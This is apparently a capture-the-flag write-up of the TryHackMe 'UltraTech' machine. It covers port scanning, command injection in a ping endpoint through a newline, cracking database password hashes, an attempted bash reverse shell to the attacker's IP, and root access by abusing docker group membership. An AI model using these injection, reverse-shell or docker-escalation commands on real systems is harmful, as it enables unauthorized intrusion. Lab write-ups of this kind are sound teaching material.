#tryhackme #linux #writeup

![[Pasted image 20250703221800.png]]

---

# Information Gathering - Nmap

I performed a TCP port scan against all 65,535 ports and found 4 open ports.

```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop/vpn]
└─$ sudo nmap -sS $IP -Pn -n --open --min-rate 3000 -p-
[sudo] password for parallels:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-02 20:46 CDT
Nmap scan report for 10.10.63.141
Host is up (0.13s latency).
Not shown: 65531 closed tcp ports (reset)
PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh
8081/tcp  open  blackice-icecap
31331/tcp open  unknown
```

I then performed a more detailed scan against those 4 ports, with version detection and the default scripts.

```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop/vpn]
└─$ nmap -sC -sV $IP -p 21,22,8081,31331
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-02 20:50 CDT
Nmap scan report for 10.10.63.141
Host is up (0.13s latency).

PORT      STATE SERVICE VERSION
21/tcp    open  ftp     vsftpd 3.0.3
22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 dc:66:89:85:e7:05:c2:a5:da:7f:01:20:3a:13:fc:27 (RSA)
|   256 c3:67:dd:26:fa:0c:56:92:f3:5b:a0:b3:8d:6d:20:ab (ECDSA)
|_  256 11:9b:5a:d6:ff:2f:e4:49:d2:b5:17:36:0e:2f:1d:2f (ED25519)
8081/tcp  open  http    Node.js Express framework
|_http-cors: HEAD GET POST PUT DELETE PATCH
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
31331/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: UltraTech - The best of technology (AI, FinTech, Big Data)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.47 seconds
```

Then finally, a UDP scan against the top 1,000 ports.
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop/vpn]
└─$ nmap -sU $IP --min-rate 3000 --top-ports 1000
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-02 20:52 CDT
Nmap scan report for 10.10.63.141
Host is up (0.13s latency).
Not shown: 994 open|filtered udp ports (no-response)
PORT      STATE  SERVICE
1718/udp  closed h225gatedisc
16832/udp closed unknown
19935/udp closed unknown
21354/udp closed unknown
28122/udp closed unknown
49211/udp closed unknown

Nmap done: 1 IP address (1 host up) scanned in 1.40 seconds
```

---

# Footprinting

This is what the landing page looks like on port `8081`.

![[Pasted image 20250702210845.png]]

`gobuster` reveals there's an `/auth` directory.

```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ gobuster dir -u http://$IP:8081 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.63.141:8081
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/auth                 (Status: 200) [Size: 39]
/ping                 (Status: 500) [Size: 1094]
```

The `/auth` page informs us that we need to specify a `login` and a `password`.

![[Pasted image 20250702211032.png]]

This is what the landing page looks like on port `31331`.
![[Pasted image 20250702211302.png]]

I browsed its `/robots.txt` file and it revealed the sitemap `/utech_sitemap.txt`.

![[Pasted image 20250702210524.png]]

`/utech_sitemap.txt` revealed 3 `.html` files: `index.html`, `what.html`, and `partners.html`.

![[Pasted image 20250702211455.png]]

I browsed all 3 and `/partners.html` instantly stood out because it mentions a "Private Partners Area" and contains a login form, where we could potentially try different credential-based attacks.

![[Pasted image 20250702211740.png]]

I tried `admin:admin` on the login form and it said "invalid credentials". Trying to log in reveals that the form sends login requests to port `8081` (the `/auth` endpoint).

![[Pasted image 20250702212153.png]]

I checked the source code of `/partners.html` and `/api.js` stood out to me. `/api.js` contains both `/api` and `/ping`, which we had seen in the output of `gobuster`.

![[Pasted image 20250703203525.png]]
![[Pasted image 20250703203540.png]]

I followed the exact format written in `/api.js` in the browser and it displayed the result of a ping.

![[Pasted image 20250703204435.png]]

I appended `%0A` (the URL encoding of `\n`, a newline) followed by `ls`, and it listed the files in the directory, which shows the endpoint is vulnerable to command injection.

![[Pasted image 20250703205135.png]]

`cat utech.db.sqlite` reveals credentials stored in the db.

![[Pasted image 20250703205456.png]]

I'm not exactly sure why there's an extra string `M` in the front, but I don't think that's part of the usernames.

```plaintext
tableusersusersCREATE TABLE users (login Varchar, password Varchar, type Int)
(Mr00tf357a0c52799563c7c7b76c1e7543a32)Madmin0d0ea5111e3c1def594c1684e3b9be84
```

r00t: `f357a0c52799563c7c7b76c1e7543a32`
admin: `0d0ea5111e3c1def594c1684e3b9be84`

Password hashes cracked! Now let's try these credentials on the login form.

![[Pasted image 20250703205911.png]]

`r00t:n100906` got me successfully logged in and it's telling `r00t` to take a look at the server's configuration.
Now let's try `admin` this time.

![[Pasted image 20250703210112.png]]

Successfully logged in with `admin:mrsheafy`. Interestingly, these credentials took me to what appears to be the exact same page.

![[Pasted image 20250703210409.png]]

At this point, I wanted to get a reverse shell, so I tried the URL-encoded payload below. However, it appears to connect for a split second and then immediately gets disconnected.

```bash
bash+-c+'bash+-i+>%26+/dev/tcp/10.23.133.183/1234+0>%261'
```

![[Pasted image 20250703212546.png]]

I tried prepending `nohup` and everything else, but it kept disconnecting. Then I remembered to try those credentials against FTP or SSH and.... I got in haha

![[Pasted image 20250703213752.png]]

# Privilege Escalation

The command `id` revealed that the `r00t` user belongs to the `docker` group.

```bash
r00t@ultratech-prod:/$ id
uid=1001(r00t) gid=1001(r00t) groups=1001(r00t),116(docker)
```

Being part of the `docker` group is a very serious privilege. It means that any user in the group can control the Docker daemon, which itself runs as root, without needing root privileges. In other words, users can create or modify Docker containers at will, and even escalate their privileges to the host operating system. With the command below, we can easily escalate our privileges to the host OS.

```bash
docker run -v /:/mnt --rm -it <docker image> chroot /mnt sh
```

This command runs a Docker container and mounts the entire file system of the host machine (`/`) into the container at the `/mnt` directory. By using `chroot /mnt sh`, the container changes its root directory to the host's file system, effectively giving the user access to the host operating system from inside the container.

I checked what Docker images are available locally and there was only one, `bash`. Then I ran the command to get a shell as root.
```bash
r00t@ultratech-prod:/$ docker images
REPOSITORY   TAG       IMAGE ID       CREATED       SIZE
bash         latest    495d6437fc1e   6 years ago   15.8MB
r00t@ultratech-prod:/$ docker run -v /:/mnt --rm -it bash chroot /mnt sh
# whoami
root
```